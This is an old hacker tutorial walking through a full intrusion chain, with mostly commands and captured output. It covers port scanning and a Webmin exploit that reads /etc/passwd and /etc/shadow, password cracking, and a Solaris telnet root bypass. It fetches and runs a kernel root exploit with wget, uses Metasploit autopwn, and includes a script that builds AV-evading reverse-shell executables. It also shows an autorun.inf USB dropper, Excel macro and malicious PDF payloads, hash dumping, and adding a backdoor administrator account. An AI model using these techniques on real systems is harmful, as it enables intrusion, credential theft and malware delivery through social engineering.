[0x02] - The Art of Unix/Linux Attack
#######################################



++++++++++++++++++++++++++++++++++
[0x02a] - Scanning & Enumeration
++++++++++++++++++++++++++++++++++

The first thing important before start hacking is gathering as much information as you can.
You can use the information to guess password, specific points to attack or anything as
you can imagine. Our favourite tool used to scan a target is nmap. We know openning ports and
a software version with only one command. We show you below :D

[Nmap Result]-----------------------------------------------------------------------------------

bt cwh # nmap -sV www.target.com

Starting Nmap 4.76 ( http://nmap.org ) at 2009-07-03 16:38 SE Asia Standard Time

Interesting ports on 192.168.0.111:
Not shown: 987 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.0.6
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
25/tcp open smtp Cisco PIX sanitized smtpd
53/tcp open domain ISC BIND 9.4.2
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.3 mod_ssl/2.2.8 OpenSSL/0.9.8g)
111/tcp filtered rpcbind
443/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.3 mod_ssl/2.2.8 OpenSSL/0.9.8g)
554/tcp filtered rtsp
1720/tcp filtered H.323/Q.931
2000/tcp filtered callbook
3306/tcp open mysql MySQL (unauthorized)
5060/tcp filtered sip
10000/tcp open http Webmin httpd
Service Info: OSs: Unix, Linux; Device: firewall

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.48 seconds

[End Result]------------------------------------------------------------------------------------


In the result, you see that this system use Webmin but we do not know the exact version.
If we are not an Alzheimer, Webmin used to expose file disclosure vulnerability in version 1.290.
We try to search in milw0rm.com and , bingo!!, We find one at http://milw0rm.com/exploits/2017 .
It is perl script exploit. So, we download the script and save as 2017.pl then we launch the command ...

[Perl Script Result]----------------------------------------------------------------------------

bt cwh # perl 2017.pl www.target.com 10000 http /etc/passwd
root:x:0:0::/root:/bin/bash
bin:x:1:1:bin:/bin:/bin/false
daemon:x:2:2:daemon:/sbin:/bin/false
adm:x:3:4:adm:/var/log:/bin/false
lp:x:4:7:lp:/var/spool/lpd:/bin/false
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/:/bin/false
news:x:9:13:news:/usr/lib/news:/bin/false
uucp:x:10:14:uucp:/var/spool/uucppublic:/bin/false
operator:x:11:0:operator:/root:/bin/bash
games:x:12:100:games:/usr/games:/bin/false
ftp:x:14:50::/home/ftp:/bin/false
smmsp:x:25:25:smmsp:/var/spool/clientmqueue:/bin/false
mysql:x:27:27:MySQL:/var/lib/mysql:/bin/bash
rpc:x:32:32:RPC portmap user:/:/bin/false
sshd:x:33:33:sshd:/:/bin/false
gdm:x:42:42:GDM:/var/state/gdm:/bin/bash
apache:x:80:80:User for Apache:/srv/httpd:/bin/false
messagebus:x:81:81:User for D-BUS:/var/run/dbus:/bin/false
haldaemon:x:82:82:User for HAL:/var/run/hald:/bin/false
pop:x:90:90:POP:/:/bin/false
nobody:x:99:99:nobody:/:/bin/false
snort:x:1000:102::/home/snort:/bin/false
user1:x:1001:100::/home/user1:

[End Perl Script Result]------------------------------------------------------------------------

lol !!! It seems that an admin is an outdated. She do not update or patch her Webmin.


++++++++++++++++++++++++++
[0x02b] - Gaining Access
++++++++++++++++++++++++++

As the target is linux server, it is harder than windows server to remotely attack.
The most remote exploits affected on linux are from third party software such as
ftp, ssh, web server. The ways to access linux server are to exploit third party
running services, to get user information from web application vulnerability then
do the brute forcing and to do social engineer toward valid user.

In our example case, we highly recommend you to try following command:

bt cwh # perl 2017.pl www.target.com 10000 http /etc/shadow

This command tries to read /etc/shadow file. If a result seem like below, you are lucky ;D

[Perl Script Result]----------------------------------------------------------------------------

root:$1$MKy0eqPM$auerQwMpGYcqgBqDddkfO/:13666:0:::::
bin:*:9797:0:::::
daemon:*:9797:0:::::
adm:*:9797:0:::::
lp:*:9797:0:::::
sync:*:9797:0:::::
shutdown:*:9797:0:::::
halt:*:9797:0:::::
mail:*:9797:0:::::
news:*:9797:0:::::
uucp:*:9797:0:::::
operator:*:9797:0:::::
games:*:9797:0:::::
ftp:*:9797:0:::::
smmsp:*:9797:0:::::
mysql:*:9797:0:::::
rpc:*:9797:0:::::
sshd:*:9797:0:::::
gdm:*:9797:0:::::
pop:*:9797:0:::::
apache:*:9797:0:::::
messagebus:*:9797:0:::::
haldaemon:*:9797:0:::::
nobody:*:9797:0:::::
snort:!:13986:0:99999:7:::
user1:$1$RY88JSH8$1A73wdGEerLFulLzzTnHX0:14428:0:99999:7:::

[End Perl Script Result]------------------------------------------------------------------------


We put the result in file shadow.txt and then try to crack passwords by using John the Ripper.
(dict.lst is dictionary file)

[John Result]-----------------------------------------------------------------------------------

bt cwh # john --wordlist=dict.lst shadow.txt
Loaded 2 password hashes with 2 different salts (FreeBSD MD5 [32/32])
user1 (user1)
guesses: 1 time: 0:00:00:00 100% c/s: 150 trying: abc

[End John Result]-------------------------------------------------------------------------------


It means that password of user1 is "user1" and cannot find password for root.
Now, you can login to the target system by using credential information of user1.

After you can find the way into the system, you have to figure the way to escalate
your privilege.

We have another example to show you. It is telnet vulnerability on solaris 10/11.
This vulnerability allows you to login easily with root privilege. We just send
[telnet –l "-froot" 192.168.0.112] to telnet deamon on solaris 10/11.

[Telnet bypass]---------------------------------------------------------------------------------

bt cwh # telnet –l "-froot" 192.168.0.112
Trying 192.168.0.112...
Connected to 192.168.0.112.
Escape character is '^]'.
Last login: Sun Jun 30 02:02:02 from 192.168.0.2
Sun Microsystems Inc. SunOS 5.10 Generic January 2007
# id
uid=0(root) gid=0(root)
#

[End Result]------------------------------------------------------------------------------------

If we use this technique, we do not want to escalate privilege cause we already login
as root privilege.


++++++++++++++++++++++++++++++++
[0x02c] - Escalating Privilege
++++++++++++++++++++++++++++++++

In this article, we introduce you to use local root exploit for linux. You can find
the exploits from milw0rm.com. the first tasks after access the system are to check
linux kernel version and the user id.

user1@linuxserver:~$ uname -a
Linux linuxserver 2.6.17-10-server #2 SMP Fri Oct 13 18:47:26 UTC 2006 i686 GNU/Linux
user1@linuxserver:~$ id
uid=1001(user1) gid=1001(user1) groups=1001(user1)

As the result of two commands above, we want to escalate our privilege to be root and
we remember that there is an local root exploit for linux 2.6.17 - 2.6.24 on milw0rm.com ;D
we do not hesitate to download the code, compile it and run. The result is shown below ...

user1@linuxserver:~$ wget http://milw0rm.com/exploits/5092
--17:17:21-- http://milw0rm.com/exploits/5092
=> `5092'
Resolving milw0rm.com... 76.74.9.18
Connecting to milw0rm.com|76.74.9.18|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]

[ <=> ] 7,197 11.58K/s

17:17:23 (11.58 KB/s) - `5092' saved [7197]

user1@linuxserver:~$ gcc -o 5092 5092.c
5092.c:289:28: warning: no newline at end of file
user1@linuxserver:~$ ./5092
-----------------------------------
Linux vmsplice Local Root Exploit
By qaaz
-----------------------------------
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0xb7e79000 .. 0xb7eab000
[+] root
root@linuxserver:~# id
uid=0(root) gid=0(root) groups=1001(root)

Finally, we are a root of target server. We can do whatever we want. XD


#####################################
[0x03] - Metasploit Ninja-Autopwned
#####################################

Metasploit is a tool for exploiting system vulnerabilities but penetration tester need to find those vulnerabilities first,
this is a drawback of metasploit. However, the lastest version of metasploit is added a feature called "Autopwned" which automatically
exploit vulnerabilities reported from nmap or nessus.
Note: Metasploit have one features called "Autopwn Metasploit Automated". That can scanning all network by nmap and Automating exploit.

+++++++++++++++++++++++++++++++++++++
[0x03a] - Nmap+Metasploit Autopwned
+++++++++++++++++++++++++++++++++++++

[Nmap Result]-----------------------------------------------------------------------------------

bt ~ # nmap -sS 192.168.80.129 -oX nmap.xml

Starting Nmap 4.85BETA10 ( http://nmap.org ) at 2009-07-03 12:04 GMT
Interesting ports on 192.168.80.129:
Not shown: 990 closed ports
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
1026/tcp open LSA-or-nterm
1027/tcp open IIS
1433/tcp open ms-sql-s
3372/tcp open msdtc
MAC Address: 00:0C:29:CC:CF:46 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 1.54 seconds

[End Result]------------------------------------------------------------------------------------

Now we got nmap.xml for import to Metasploit framework...

[Import Nmap result to Metasploit]--------------------------------------------------------------

bt framework3 # msfconsole
_ _ _ _
| | | | (_) |
_ __ ___ ___| |_ __ _ ___ _ __ | | ___ _| |_
| '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __|
| | | | | | __/ || (_| \__ \ |_) | | (_) | | |_
|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__|
| |
|_|


=[ msf v3.3-dev
+ -- --=[ 288 exploits - 124 payloads
+ -- --=[ 17 encoders - 6 nops
=[ 56 aux

msf > load db_sqlite3
[*] Successfully loaded plugin: db_sqlite3
msf > db_create /tmp/test.db
[*] Creating a new database instance...
[*] Successfully connected to the database
[*] File: /tmp/test.db
msf > db_import_nmap_xml /root/nmap.xml
msf > db_hosts
[*] Time: Fri Jul 03 14:01:56 +0000 2009 Host: 192.168.80.129 Status: alive OS:
msf > db_autopwn -p -e
[*] (3/116): Launching exploit/unix/webapp/tikiwiki_jhot_exec against 192.168.80.129:80...
[*] (8/116): Launching exploit/unix/webapp/awstats_configdir_exec against 192.168.80.129:80...
[*] (9/116): Launching exploit/windows/http/bea_weblogic_transfer_encoding against 192.168.80.129:80...

[*] Started bind handler
[*] Started bind handler
[*] (12/116): Launching exploit/unix/webapp/awstats_migrate_exec against 192.168.80.129:80...
[*] (13/116): Launching exploit/windows/dcerpc/ms03_026_dcom against 192.168.80.129:135...
[*] Started bind handler
[*] Started bind handler
[*] Job limit reached, waiting on modules to finish...
[*] The server returned: 404 Object Not Found
[*] This server may not be vulnerable
[*] Started bind handler
[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.80.129[135] ...
[*] The server returned: 404 Object Not Found
[*] This server may not be vulnerable
[*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.80.129[135] ...
[*] Sending exploit ...
[*] The DCERPC service did not reply to our request
[*] Command shell session 1 opened (192.168.80.131:52929 -> 192.168.80.129:10529)
.......
.......
sessions -l

Active sessions
===============

Id Description Tunnel
-- ----------- ------
1 Command shell 192.168.80.131:52929 -> 192.168.80.129:10529
2 Command shell 192.168.80.131:50775 -> 192.168.80.129:17887
3 Command shell 192.168.80.131:40985 -> 192.168.80.129:37295
4 Command shell 192.168.80.131:51652 -> 192.168.80.129:37095
5 Command shell 192.168.80.131:38373 -> 192.168.80.129:17130
6 Command shell 192.168.80.131:56722 -> 192.168.80.129:20693

msf >sessions -i 1
[*] Starting interaction with 1...

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>ipconfig
ipconfig

Windows 2000 IP Configuration

Ethernet adapter Local Area Connection:

Connection-specific DNS Suffix . : localdomain
IP Address. . . . . . . . . . . . : 192.168.80.129
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.80.2

C:\WINNT\system32>

[End Result]------------------------------------------------------------------------------------


+++++++++++++++++++++++++++++++++++++++
[0x03b] - Nessus+Metasploit Autopwned
+++++++++++++++++++++++++++++++++++++++

First, you must use Nessus scanner for VA and export file with *.nbe, then import to metasploit framework for autopwn

[Import Nessus(nbe) result to Metasploit]-------------------------------------------------------

bt framework3 # msfconsole

# # ###### ##### ## #### ##### # #### # #####
## ## # # # # # # # # # # # #
# ## # ##### # # # #### # # # # # # #
# # # # ###### # ##### # # # # #
# # # # # # # # # # # # # #
# # ###### # # # #### # ###### #### # #


=[ msf v3.3-dev
+ -- --=[ 288 exploits - 124 payloads
+ -- --=[ 17 encoders - 6 nops
=[ 56 aux

msf > load db_sqlite3
[*] Successfully loaded plugin: db_sqlite3
msf > db_create /tmp/ness.db
[*] Creating a new database instance...
[*] Successfully connected to the database
[*] File: /tmp/ness.db
msf > db_import_nessus_nbe /root/demo.nbe
msf > db_hosts
[*] Time: Fri Jul 03 14:43:58 +0000 2009 Host: 192.168.80.129 Status: alive OS:
msf > db_autopwn -x -t
[*] Analysis completed in 4.28915095329285 seconds (17 vulns / 1145 refs)
[*] Matched auxiliary/dos/windows/smb/ms05_047_pnp against 192.168.80.129:445...
[*] Matched exploit/windows/dcerpc/ms03_026_dcom against 192.168.80.129:135...
[*] Matched exploit/windows/smb/ms06_040_netapi against 192.168.80.129:445...
[*] Matched exploit/windows/mssql/ms02_039_slammer against 192.168.80.129:1434...
[*] Matched exploit/windows/smb/ms05_039_pnp against 192.168.80.129:445...
[*] Matched exploit/windows/smb/ms04_011_lsass against 192.168.80.129:445...
msf > db_autopwn -x -e
[*] (2/6): Launching exploit/windows/dcerpc/ms03_026_dcom against 192.168.80.129:135...
[*] (3/6): Launching exploit/windows/smb/ms06_040_netapi against 192.168.80.129:445...

[*] Started bind handler
[*] (4/6): Launching exploit/windows/mssql/ms02_039_slammer against 192.168.80.129:1434...
[*] Started bind handler
[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.80.129[135] ...
[*] (5/6): Launching exploit/windows/smb/ms05_039_pnp against 192.168.80.129:445...
[*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.80.129[135] ...
[*] Started bind handler
[*] (6/6): Launching exploit/windows/smb/ms04_011_lsass against 192.168.80.129:445...
[*] Sending UDP packet with return address 0x42b48774
[*] Execute 'net start sqlserveragent' once access is obtained
[*] Started bind handler
[*] Connecting to the SMB service...
[*] Sending exploit ...
msf >
[*] Detected a Windows 2000 target
[*] Binding to 4b324fc8-1670-01d3-1278-5a47bf6ee188:3.0@ncacn_np:192.168.80.129[\BROWSER] ...
[*] Started bind handler
[*] Binding to 8d9f4e40-a03d-11ce-8f69-08003e30051b:1.0@ncacn_np:192.168.80.129[\browser] ...
[*] The DCERPC service did not reply to our request
[*] Command shell session 1 opened (192.168.80.131:41655 -> 192.168.80.129:39354)
[*] Command shell session 2 opened (192.168.80.131:57118 -> 192.168.80.129:7605)
[*] Binding to 3919286a-b10c-11d0-9ba8-00c04fd92ef5:0.0@ncacn_np:192.168.80.129[\lsarpc]...
[*] Bound to 4b324fc8-1670-01d3-1278-5a47bf6ee188:3.0@ncacn_np:192.168.80.129[\BROWSER] ...
[*] Building the stub data...
[*] Bound to 8d9f4e40-a03d-11ce-8f69-08003e30051b:1.0@ncacn_np:192.168.80.129[\browser] ...
[*] Calling the vulnerable function...
[*] Bound to 3919286a-b10c-11d0-9ba8-00c04fd92ef5:0.0@ncacn_np:192.168.80.129[\lsarpc]...
[*] Getting OS information...
[*] Trying to exploit Windows 5.0
[*] Calling the vulnerable function...
[+] Server did not respond, this is expected
[*] Command shell session 3 opened (192.168.80.131:50407 -> 192.168.80.129:15299)
[*] Command shell session 4 opened (192.168.80.131:32768 -> 192.168.80.129:30092)
[*] The DCERPC service did not reply to our request
[*] Command shell session 5 opened (192.168.80.131:39556 -> 192.168.80.129:17330)
sessions -l

Active sessions
===============

Id Description Tunnel
-- ----------- ------
1 Command shell 192.168.80.131:41655 -> 192.168.80.129:39354
2 Command shell 192.168.80.131:57118 -> 192.168.80.129:7605
3 Command shell 192.168.80.131:50407 -> 192.168.80.129:15299
4 Command shell 192.168.80.131:32768 -> 192.168.80.129:30092
5 Command shell 192.168.80.131:39556 -> 192.168.80.129:17330

msf > sessions -i 3
[*] Starting interaction with 3...

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

C:\WINNT\system32>ipconfig
ipconfig

Windows 2000 IP Configuration

Ethernet adapter Local Area Connection:

Connection-specific DNS Suffix . : localdomain
IP Address. . . . . . . . . . . . : 192.168.80.129
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.80.2

C:\WINNT\system32>

[End Result]------------------------------------------------------------------------------------


#############################################
[0x04] - Client-Side Attack with Metasploit
#############################################


++++++++++++++++++++++++++++++++++++++++
[0x04a] - Metasploit Payload Generator
++++++++++++++++++++++++++++++++++++++++

Metasploit Payload Generator is a tool allowing you to create malicious code easily.
This is not a tool to exploit a system. You can use the tool to create malicious payload and
save it to exe file then you need to lure a victim to execute that file on his/her machine.

There is a feature to encode your payload to get past most AV and IDS/IPS (13 Encoding Choices).
So we can use Metasploit Payload Generator from "Fast-Track". If you don't have "fast-track", you need
Metasploit framework and this script for you ;)

[metascript]------------------------------------------------------------------------------------

#!/bin/bash
echo "###########################################"
echo "#### 0-Days Exploits with MetaCompiler ####"
echo "###########################################"
echo ""
echo -n "Enter your Listener IP Address: "
read ip
echo -n "Enter your Listener Port: "
read port
echo ""
echo "-= MetaCompiler Payloads =-"
echo ""
echo "+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++"
echo "+ Meterpreter Reverse Connectback - windows/meterpreter/reverse_tcp +"
echo "+ VNC Inject Reverse Connectback - windows/vncinject/reverse_tcp +"
echo "+ Generic Reverse Shell - generic/shell_reverse_tcp +"
echo "+ Linux X86 Reverse Shell - linux/x86/shell_reverse_tcp +"
echo "+ Mac OSX (iphone) Reverse Shell - osx/ppc/shell/reverse_tcp +"
echo "+ Windows Reverse Shell - windows/shell/reverse_tcp +"
echo "+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++"
echo ""
echo -n "Enter your Payload Exploit: "
read payload
echo -n "Enter your Output file name (xpl.exe): "
read file
echo ""
echo "-= Processing =-"
/pentest/exploits/framework3/msfpayload $payload LHOST=$ip LPORT=$port R | /pentest/exploits/framework3/msfencode -b '' -t exe -o $file
echo "Enjoy 0-Days Exploit with $file ;)"
echo ""
echo ""
echo "-= Now Waiting for Reverse Connection from Victim =-"
/pentest/exploits/framework3/msfcli multi/handler PAYLOAD=$payload LHOST=$ip LPORT=$port DisableCourtesyShell=True E

[End script]------------------------------------------------------------------------------------


Next, Example for using "Fast-Track".


[Metasploit Gen]--------------------------------------------------------------------------------

bt fast-track # ./fast-track.py -i

***********************************************
******* Performing dependency checks... *******
***********************************************

*** FreeTDS and PYMMSQL are installed. (Check) ***
*** PExpect is installed. (Check) ***
*** ClientForm is installed. (Check) ***
*** Psyco is installed. (Check) ***
*** Beautiful Soup is installed. (Check) ***
*** PyMills is installed. (Check) ***

Also ensure ProFTP, WinEXE, and SQLite3 is installed from
the Updates/Installation menu.

Your system has all requirements needed to run Fast-Track!

Fast-Track Main Menu:

Fast-Track - Where it's OK to finish in under 3 minutes...
Version: v4.0
Written by: David Kennedy (ReL1K)
http://www.securestate.com
http://www.thepentest.com

1. Fast-Track Updates
2. External Hacking
3. Internal Hacking
4. Exploits
5. SQLPwnage
6. Payload Generator
7. Tutorials
8. Changelog
9. Credits
10. About
11. Exit

Enter the number: 6
Configuration file not detected, running default path.
Recommend running setup.py install to configure Fast-Track.

#####################################
### ###
### Metasploit Payload Generator ###
### ###
### Written by: Dave Kennedy ###
### aka ReL1K ###
### ###
#####################################
#####################################


The Metasploit Payload Generator is a simple tool to
make it extremely easy to generate a payload and listener
on the Metasploit framework. This does not actually
exploit any systems, it will generate a metasploit payload
for you and save it to an executable. You then need to
someone get it on the remote server by yourself and get it
to execute correctly.

This will also encode your payload to get past most AV and
IDS/IPS.


What payload do you want to generate:

Name: Description:

1. Windows Shell Reverse_TCP Spawn a command shell on victim and send back to attacker.
2. Windows Reverse_TCP Meterpreter Spawn a meterpreter shell on victim and send back to attacker.
3. Windows Reverse_TCP VNC DLL Spawn a VNC server on victim and send back to attacker.
4. Windows Bind Shell Execute payload and create an accepting port on remote system.
5. Windows Reflective Reverse VNC Spawn a VNC server on victim and send back to attacker.
6. Windows Reflective Reverse Meterpreter Spawn a Meterpreter shell on victim through Reflective to attacker.

Enter choice (example 1-6): 2

Below is a list of encodings to try and bypass AV.

Select one of the below, Avoid_UTF8_tolower usually gets past them.

1. avoid_utf8_tolower
2. shikata_ga_nai
3. alpha_mixed
4. alpha_upper
5. call4_dword_xor
6. countdown
7. fnstenv_mov
8. jmp_call_additive
9. nonalpha
10. nonupper
11. unicode_mixed
12. unicode_upper
13. alpha2
14. No Encoding

Enter your choice : 2

Enter IP Address of the listener/attacker (reverse) or host/victim (bind shell): 192.168.80.131
Enter the port of the Listener: 5555

Do you want to create an EXE or Shellcode

1. Executable
2. Shellcode

Enter your choice: 1
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
Length: 278
Options: LHOST=192.168.80.131,LPORT=5555,ENCODING=shikata_ga_nai


A payload has been created in this directory and is named 'payload.exe'. Enjoy!


Do you want to start a listener to receive the payload yes or no: yes

Launching Listener...
***********************************************************************************************

Launching MSFCLI on 'exploit/multi/handler' with PAYLOAD='windows/meterpreter/reverse_tcp'
Listening on IP: 192.168.80.131 on Local Port: 5555 Using encoding: ENCODING=shikata_ga_nai

***********************************************************************************************
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler...
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] Meterpreter session 1 opened (192.168.80.131:5555 -> 192.168.80.1:13948)

meterpreter > getuid
Server username: LENOVO-X200\prathan
meterpreter > use priv
Loading extension priv...success.
meterpreter > hashdump
Administrator:500:F703F386322B0662E72C57EF50F76A05:C62638B38308E651B21A0F2CCAB3AC9B
Guest:501:A0E150C75A17008EAAD3B435B51404EE:823893ADFAD2CDA6E1A414F3EBDF58F7
prathan:1003:879980DE48006E7EAAD3B435B51404EE:BA69764BCCF8F41121E0B3046CE46C67
TsInternetUser:1002:52FE1A30EB33BA7BE3BB722E78963414:3A07E408DB9CB2331C9C527B0F4A8C52
meterpreter > execute -H -i -f cmd.exe
Process 692 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\prathan\Desktop>hostname
LENOVO-X200

C:\Documents and Settings\prathan\Desktop>net user cwh 1234 /add
net user cwh 1234 /add
The command completed successfully.

C:\Documents and Settings\prathan\Desktop>net localgroup administrators cwh /add
net localgroup administrators cwh /add
The command completed successfully.

C:\Documents and Settings\prathan\Desktop>net user
net user

User accounts for \\

-------------------------------------------------------------------------------
Administrator cwh Guest
prathan TsInternetUser
The command completed with one or more errors.

[End Result]------------------------------------------------------------------------------------

From Above, We can Attack victim from Social-engineering if they execute "payload.exe". What's happen If we use Autorun.inf to force them execute our files.

[USB Pwnage]------------------------------------------------------------------------------------

+autorun.inf
[autorun]
action=Open Files On Folder
icon=icons\drive.ico
shellexecute=nircmd.exe execmd CALL batexe\progstart.bat

+icons
+nircmd.exe

+batexe
-progstart.bat
@echo off
nircmd.exe execmd CALL batexe\moddump.bat
nircmd.exe execmd CALL batexe\modsmax.bat

-moddump.bat
@echo off
nircmd.exe execmd .\batexe\payload.exe

-modsmax.bat
@echo off
start ..
nircmd.exe win max ititle "Remo"

[End File]-------------------------------------------------------------------------------------

If someone open USB drive with Autorun or Double-click USB drive from My computer, Their System will compromised !!


++++++++++++++++++++++++++++++++++
[0x04b] - MS-Office Macro Ownage
++++++++++++++++++++++++++++++++++

MS word, Excel, Powerpoint, etc. can import VBscript to their files. Metasploit can generate VBScript that contains Malicious Payload !!
In this example, we will show script for exploiting victim with MS-Excel. The victim machine will start reverse VNC to our machine after
the victim opens MS-Excel file.

[Msf script]------------------------------------------------------------------------------------

bt framework3 # ./msfpayload windows/vncinject/reverse_tcp LHOST=192.168.80.131 V > /tmp/script.bas
bt framework3 # ./msfcli multi/handler PAYLOAD=windows/vncinject/reverse_tcp LHOST=192.168.80.131 DisableCourtesyShell=True E
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler...
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (2658 bytes)
[*] Sleeping before handling stage...

[End Result]------------------------------------------------------------------------------------


Now we have "script.bas", Open MSExcel -> Tools -> Macro -> Visual Basic Editor then import "script.bas" and SAVE Excel file.
After that use your skill for social engineering, Force them to open MSExcel and Enable Macros. We will control target via VNC viewer with their privilege.


++++++++++++++++++++++++++++++++++
[0x04c] - AdobeReader PDF Ownage
++++++++++++++++++++++++++++++++++

Metasploit has exploit script for Generating Malicious PDF file to Attack through "Adobe JBIG2Decode Memory Corruption".
This module exploits a heap-based pointer corruption flaw in Adobe Reader 9.0.0 and earlier.
When we generate malicious PDF, send to victim and social-engineering for open PDF file. Game Over !!

[AdobeReader Exploit]---------------------------------------------------------------------------

bt framework3 # msfconsole
_ _ _ _
| | | | (_) |
_ __ ___ ___| |_ __ _ ___ _ __ | | ___ _| |_
| '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __|
| | | | | | __/ || (_| \__ \ |_) | | (_) | | |_
|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__|
| |
|_|


=[ msf v3.3-dev
+ -- --=[ 288 exploits - 124 payloads
+ -- --=[ 17 encoders - 6 nops
=[ 56 aux

msf > use windows/fileformat/adobe_jbig2decode
msf exploit(adobe_jbig2decode) > set TARGET 0
TARGET => 0
msf exploit(adobe_jbig2decode) > set FILENAME malfile.pdf
FILENAME => malfile.pdf
msf exploit(adobe_jbig2decode) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(adobe_jbig2decode) > set LHOST 192.168.80.131
LHOST => 192.168.80.131
msf exploit(adobe_jbig2decode) > exploit

[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Creating 'malfile.pdf' file...
[*] Generated output file /pentest/exploits/framework3/data/exploits/malfile.pdf
[*] Exploit completed, but no session was created.
msf exploit(adobe_jbig2decode) > exit
bt framework3 # ./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LPORT=4444
LHOST=192.168.80.131 E
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler...
[*] Transmitting intermediate stanger for over-sized stage...(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] Meterpreter session 1 opened (192.168.80.131:4444 -> 192.168.80.132:1041)

meterpreter > getuid
Server username: WINXP\victim
meterpreter > execute -H -i -f cmd.exe
Process 692 created.
Channel 1 created.
Micorsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\victim\Desktop> Ownage Again !!!

[End Result]------------------------------------------------------------------------------------

Other techniques such as "DNS Spoofing+IE7" was great for Mass Exploit, you can see video at http://www.milw0rm.com/video/watch.php?id=96
That use Ettercap for DNS spoofing then use Metasploit for handling reverse shell from "IE7 MS09-002 Memory Corruption Vulnerability".That force all machine in the same network
drive to attacker's machine and ... Game Over !!


#####################
[0x05] - References
#####################

[1] SANS: Scanning Windows Deepers With Nmap Scanning Engines
[2] http://nmap.org
[3] http://oss.coresecurity.com/projects/pshtoolkit.html
[4] http://blog.metasploit.com/
[5] http://foofus.net/jmk/passhash.html
[6] Full Scope Security Attacking Layer 8
[7] PaulDotCom Forum
[8] www.milw0rm.com


####################
[0x06] - Greetz To
####################

Greetz : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos, Gdiupo, GnuKDE, JK
Special Thx : asylu3, str0ke, citec.us, milw0rm.com

----------------------------------------------------
This paper is written for Educational purpose only. The authors are not responsible for any damage
originating from using this paper in wrong objective. If you want to use this knowleadge with other person systems,
you must request for consent from system owner before
----------------------------------------------------



referensi:milw0rm

• Stumble This!
• Mark as Delicious!
• Bookmark on Facebook!
• Tweet This!